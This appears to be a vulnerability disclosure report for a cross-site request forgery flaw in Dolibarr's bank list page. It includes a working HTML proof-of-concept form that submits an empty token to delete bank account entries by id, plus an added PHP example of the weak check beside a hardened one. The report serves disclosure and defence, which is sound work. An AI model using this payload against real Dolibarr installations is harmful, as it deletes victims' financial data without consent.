Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr
Valid
Reported on Jul 21st 2021
✍️ Description
In the Bank section, the Bank | Cash part, you protect List entities against deletion via CSRF attacks, but if I set the CSRF token to nothing then I am able to delete arbitrary List entities just by knowing their ids.
🕵️‍♂️ Proof of Concept
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.dolibarr.org/compta/bank/list.php" method="POST">
<input type="hidden" name="token" value="" />
<input type="hidden" name="formfilteraction" value="list" />
<input type="hidden" name="action" value="list" />
<input type="hidden" name="sortfield" value="b.label" />
<input type="hidden" name="sortorder" value="ASC" />
<input type="hidden" name="contextpage" value="bankaccountlist" />
<input type="hidden" name="page" value="0" />
<input type="hidden" name="search_status" value="opened" />
<input type="hidden" name="pageplusoneold" value="1" />
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="token" value="" />
<input type="hidden" name="confirm" value="yes" />
<input type="hidden" name="search_ref" value="" />
<input type="hidden" name="search_label" value="" />
<input type="hidden" name="search_status" value="opened" />
<input type="hidden" name="selectedfields" value="b.ref,b.label,accountype,b.account_number,b.fk_accountancy_journal,toreconcile,b.datec,b.tms,b.clos,balance," />
<input type="hidden" name="toselect[]" value="256" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
This vulnerability is capable of deleting the mentioned List entities from the tools section. Version of application == 14 (tested on demo website).
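The failure mode the report describes is a token check that is only enforced when a token is actually submitted, so an empty "token" field skips it. The following is an added illustrative example, not Dolibarr's own code; the function names and the sample POST bodies are hypothetical, and it contrasts that weak pattern with a check that rejects missing or empty tokens and compares in constant time.

```php
<?php
// Added illustrative example (not Dolibarr's own code). Function names
// check_csrf_vulnerable / check_csrf_fixed are hypothetical.

// Weak pattern: the comparison runs only when a token was supplied,
// so an empty token (as in the PoC form) is accepted as valid.
function check_csrf_vulnerable(string $submitted, string $expected): bool
{
    if ($submitted !== '' && $submitted !== $expected) {
        return false;   // a mismatch is detected only for non-empty tokens
    }
    return true;        // "" passes here regardless of $expected
}

// Hardened pattern: every state-changing request must carry a token,
// the session must hold one, and the comparison is constant-time.
function check_csrf_fixed(?string $submitted, ?string $expected): bool
{
    if ($submitted === null || $submitted === '' ||
        $expected === null || $expected === '') {
        return false;   // missing or empty token is never acceptable
    }
    return hash_equals($expected, $submitted);
}

// Constructed sample data: a per-session token, the body a forged
// cross-site form would submit, and the body a genuine form would submit.
$sessionToken = bin2hex(random_bytes(16));
$forgedPost   = ['action' => 'delete', 'confirm' => 'yes', 'token' => ''];
$genuinePost  = ['action' => 'delete', 'confirm' => 'yes', 'token' => $sessionToken];

foreach (['forged' => $forgedPost, 'genuine' => $genuinePost] as $label => $post) {
    $tok = $post['token'] ?? null;
    printf("%-8s vulnerable=%s fixed=%s\n", $label,
        check_csrf_vulnerable((string) $tok, $sessionToken) ? 'ALLOW' : 'DENY',
        check_csrf_fixed($tok, $sessionToken) ? 'ALLOW' : 'DENY');
}
```

Run it with `php` on the command line: the forged body is allowed by the weak check and denied by the hardened one, while the genuine body passes both.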
We have contacted a member of the dolibarr team and are waiting to hear back.
amammad modified the report (2 years ago)